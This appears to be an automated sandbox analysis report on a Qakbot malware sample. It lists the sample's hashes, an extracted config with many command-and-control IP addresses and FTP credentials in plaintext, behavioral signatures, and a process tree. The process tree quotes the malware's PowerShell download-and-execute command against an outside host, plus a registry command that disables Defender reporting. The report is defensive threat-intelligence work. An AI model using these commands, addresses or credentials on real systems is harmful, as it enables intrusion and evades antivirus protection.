Analysis
-
max time kernel
12s -
max time network
43s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
14-02-2022 15:49
Static task
static1
Behavioral task
behavioral1
Sample
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Resource
win10v2004-en-20220113
General
-
Target
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
-
Size
397KB
-
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8
-
SHA1
802b22bdd827d1921534d93d31e9df2735156210
-
SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
-
SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
322.148
1518695014
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
[email protected] - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
179.62.153.88:443
50.198.141.161:2222
69.129.91.38:443
66.189.228.49:995
96.253.104.73:443
71.183.129.113:443
125.25.130.203:995
173.175.174.154:443
162.104.186.175:995
75.109.222.140:995
68.173.55.51:443
78.175.254.43:443
106.159.251.143:995
47.143.83.172:443
71.190.202.120:443
73.136.232.174:995
96.253.104.73:995
192.158.217.32:22
65.153.16.250:993
70.95.129.59:443
105.225.253.101:443
216.93.143.182:995
71.41.141.206:443
69.129.91.38:32102
47.223.78.244:993
47.40.29.239:443
47.33.213.104:443
74.93.207.181:993
178.54.193.161:443
156.217.12.177:443
66.222.48.40:443
96.70.92.177:1194
74.95.207.214:990
47.221.46.163:443
65.73.215.139:990
198.0.111.129:443
70.117.246.103:443
96.253.104.73:50002
24.240.235.106:443
68.133.47.184:443
70.167.30.88:443
216.218.74.196:443
199.115.167.168:443
132.206.59.132:443
74.95.207.214:443
72.204.249.114:2222
87.243.32.159:443
76.0.178.104:443
189.155.221.97:993
209.212.131.66:443
78.158.195.141:995
47.201.56.21:443
65.40.207.151:995
47.149.85.238:443
104.231.199.203:443
69.193.199.50:443
74.84.15.214:443
174.66.86.206:443
190.137.200.166:443
216.201.159.118:443
99.196.254.46:443
73.126.4.33:443
68.5.211.85:443
50.42.189.206:993
78.182.109.227:443
98.103.2.226:443
75.127.141.50:995
65.100.49.186:465
12.161.77.98:443
109.75.195.157:443
76.27.69.75:443
70.94.109.57:443
65.153.16.250:995
50.195.161.2:995
98.216.56.48:443
47.22.21.180:995
67.83.122.112:2222
209.213.24.194:443
97.68.164.170:990
24.176.181.14:443
142.114.93.235:2222
75.83.30.135:443
68.50.161.232:443
31.206.147.0:995
24.119.224.202:2078
68.0.186.126:443
184.186.73.221:443
100.35.65.82:995
174.57.88.157:443
46.175.67.170:443
50.74.66.214:443
96.85.138.153:995
71.85.72.9:443
175.107.54.44:443
65.153.16.250:465
103.228.43.58:443
76.104.40.157:443
68.203.159.21:443
73.1.116.205:443
86.57.136.126:990
73.136.132.231:443
192.158.217.32:443
70.189.67.15:443
45.36.199.50:443
186.107.214.4:443
173.49.95.92:443
203.109.206.203:465
73.198.142.130:995
174.58.149.247:443
98.74.157.85:443
73.206.97.214:443
104.33.67.39:443
135.84.195.154:995
189.155.221.97:995
73.182.163.200:443
50.73.23.181:995
74.95.207.214:995
73.93.154.150:443
186.109.26.149:443
65.100.49.186:443
74.95.207.214:465
74.69.244.255:443
68.83.130.163:443
73.77.17.146:443
108.58.129.90:443
74.42.21.175:995
49.151.84.2:443
108.35.28.73:443
98.218.243.27:443
76.177.73.90:995
71.41.225.171:443
24.187.255.116:443
24.223.103.6:443
74.95.207.214:993
76.95.241.114:443
69.41.8.88:443
23.240.50.137:443
47.201.138.241:443
69.132.80.73:443
68.198.107.62:2222
65.33.119.17:443
50.244.177.253:443
65.100.49.186:995
12.166.108.82:995
108.58.129.90:995
187.138.102.154:443
65.100.49.186:2222
50.44.111.101:443
170.231.89.56:2222
108.27.217.183:443
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 28 4416 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
uoytfb.exeuoytfb.exepid process 4712 uoytfb.exe 204 uoytfb.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ionh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Uoytfbo\\uoytfb.exe\"" explorer.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service uoytfb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 uoytfb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service uoytfb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 uoytfb.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc uoytfb.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc uoytfb.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.exepowershell.exeuoytfb.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exepid process 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 4676 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 4676 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 4676 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 4676 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 4712 uoytfb.exe 4712 uoytfb.exe 4416 powershell.exe 4416 powershell.exe 204 uoytfb.exe 204 uoytfb.exe 204 uoytfb.exe 204 uoytfb.exe 3080 explorer.exe 3080 explorer.exe 3080 explorer.exe 3080 explorer.exe 2356 sihost.exe 2356 sihost.exe 2368 svchost.exe 2368 svchost.exe 2448 taskhostw.exe 2448 taskhostw.exe 1164 Explorer.EXE 1164 Explorer.EXE 3172 svchost.exe 3172 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
uoytfb.exepid process 4712 uoytfb.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
svchost.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2788 svchost.exe Token: SeCreatePagefilePrivilege 2788 svchost.exe Token: SeShutdownPrivilege 2788 svchost.exe Token: SeCreatePagefilePrivilege 2788 svchost.exe Token: SeShutdownPrivilege 2788 svchost.exe Token: SeCreatePagefilePrivilege 2788 svchost.exe Token: SeDebugPrivilege 4416 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exeuoytfb.execmd.exeexplorer.exedescription pid process target process PID 3992 wrote to memory of 4676 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe PID 3992 wrote to memory of 4676 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe PID 3992 wrote to memory of 4676 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe PID 3992 wrote to memory of 4712 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe uoytfb.exe PID 3992 wrote to memory of 4712 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe uoytfb.exe PID 3992 wrote to memory of 4712 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe uoytfb.exe PID 3992 wrote to memory of 4708 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe reg.exe PID 3992 wrote to memory of 4708 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe reg.exe PID 3992 wrote to memory of 4416 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe powershell.exe PID 3992 wrote to memory of 4416 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe powershell.exe PID 4712 wrote to memory of 204 4712 uoytfb.exe uoytfb.exe PID 4712 wrote to memory of 204 4712 uoytfb.exe uoytfb.exe PID 4712 wrote to memory of 204 4712 uoytfb.exe uoytfb.exe PID 3992 wrote to memory of 552 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe cmd.exe PID 3992 wrote to memory of 552 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe cmd.exe PID 3992 wrote to memory of 552 3992 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe cmd.exe PID 552 wrote to memory of 4500 552 cmd.exe PING.EXE PID 552 wrote to memory of 4500 552 cmd.exe PING.EXE PID 552 wrote to memory of 4500 552 cmd.exe PING.EXE PID 4712 wrote to memory of 3080 4712 uoytfb.exe explorer.exe PID 4712 wrote to memory of 3080 4712 uoytfb.exe explorer.exe PID 4712 wrote to memory of 3080 4712 uoytfb.exe explorer.exe PID 4712 wrote to memory of 3080 4712 uoytfb.exe explorer.exe PID 3080 wrote to memory of 2356 3080 explorer.exe sihost.exe PID 3080 wrote to memory of 2356 3080 explorer.exe sihost.exe PID 3080 wrote to memory of 2356 3080 explorer.exe sihost.exe PID 3080 wrote to memory of 2368 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 2368 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 2368 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 2448 3080 explorer.exe taskhostw.exe PID 3080 wrote to memory of 2448 3080 explorer.exe taskhostw.exe PID 3080 wrote to memory of 2448 3080 explorer.exe taskhostw.exe PID 3080 wrote to memory of 1164 3080 explorer.exe Explorer.EXE PID 3080 wrote to memory of 1164 3080 explorer.exe Explorer.EXE PID 3080 wrote to memory of 1164 3080 explorer.exe Explorer.EXE PID 3080 wrote to memory of 3172 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 3172 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 3172 3080 explorer.exe svchost.exe PID 3080 wrote to memory of 3372 3080 explorer.exe DllHost.exe PID 3080 wrote to memory of 3372 3080 explorer.exe DllHost.exe PID 3080 wrote to memory of 3372 3080 explorer.exe DllHost.exe
Processes
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe" /C3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exeC:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exe" /C4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\bksepjahliayxqbggiwtvkkynfxu.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytf.datMD5
7f07f2adfbf1faeb1c2531cfb9bc0376
SHA14608e558a3f5947d480e0573c423b6eaa4d8dac9
SHA2567c212f58d180bd9b22820de5e4304f2efb59801011a9941202c301f4b9e04a27
SHA51224fb49f4e6765ddd446d9012ff85e60734bd4a64d90ace1c9d3c99c34fa87b7bcbd33af898ea7668bc0f337de92b8c0a09e9a62dbab60c3a2210c5059d0d72c7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exeMD5
a0a9bf99af2c13b678a17f3f7f8b73c8
SHA1802b22bdd827d1921534d93d31e9df2735156210
SHA2566347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
SHA5123d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exeMD5
a0a9bf99af2c13b678a17f3f7f8b73c8
SHA1802b22bdd827d1921534d93d31e9df2735156210
SHA2566347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
SHA5123d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415
-
C:\Users\Admin\AppData\Roaming\Microsoft\Uoytfbo\uoytfb.exeMD5
a0a9bf99af2c13b678a17f3f7f8b73c8
SHA1802b22bdd827d1921534d93d31e9df2735156210
SHA2566347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
SHA5123d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415
-
memory/1164-153-0x0000000000F90000-0x0000000000FBC000-memory.dmpFilesize
176KB
-
memory/1164-155-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmpFilesize
4KB
-
memory/2356-147-0x00000000004F0000-0x00000000004F1000-memory.dmpFilesize
4KB
-
memory/2356-150-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmpFilesize
4KB
-
memory/2356-149-0x00007FF975B8D000-0x00007FF975B8E000-memory.dmpFilesize
4KB
-
memory/2356-148-0x0000000000490000-0x00000000004BC000-memory.dmpFilesize
176KB
-
memory/2368-156-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmpFilesize
4KB
-
memory/2368-154-0x0000000000B10000-0x0000000000B3C000-memory.dmpFilesize
176KB
-
memory/2448-159-0x00007FF975AE0000-0x00007FF975AE1000-memory.dmpFilesize
4KB
-
memory/2448-158-0x0000000000C90000-0x0000000000CBC000-memory.dmpFilesize
176KB
-
memory/2788-134-0x000001CD19290000-0x000001CD19294000-memory.dmpFilesize
16KB
-
memory/2788-133-0x000001CD16590000-0x000001CD165A0000-memory.dmpFilesize
64KB
-
memory/2788-132-0x000001CD16530000-0x000001CD16540000-memory.dmpFilesize
64KB
-
memory/3080-151-0x00000000034F0000-0x00000000034F1000-memory.dmpFilesize
4KB
-
memory/3080-146-0x0000000003000000-0x0000000003001000-memory.dmpFilesize
4KB
-
memory/3080-145-0x0000000002E60000-0x0000000002E61000-memory.dmpFilesize
4KB
-
memory/3080-144-0x00000000014F0000-0x00000000014F1000-memory.dmpFilesize
4KB
-
memory/3080-143-0x0000000002E30000-0x0000000002E5F000-memory.dmpFilesize
188KB
-
memory/3080-152-0x0000000003550000-0x0000000003551000-memory.dmpFilesize
4KB
-
memory/3080-142-0x0000000001020000-0x0000000001088000-memory.dmpFilesize
416KB
-
memory/3080-157-0x0000000003520000-0x0000000003521000-memory.dmpFilesize
4KB
-
memory/4416-139-0x000002B053106000-0x000002B053108000-memory.dmpFilesize
8KB
-
memory/4416-138-0x000002B053103000-0x000002B053105000-memory.dmpFilesize
8KB
-
memory/4416-137-0x000002B053100000-0x000002B053102000-memory.dmpFilesize
8KB
-
memory/4416-136-0x00007FF954473000-0x00007FF954475000-memory.dmpFilesize
8KB
-
memory/4416-135-0x000002B053180000-0x000002B0531A2000-memory.dmpFilesize
136KB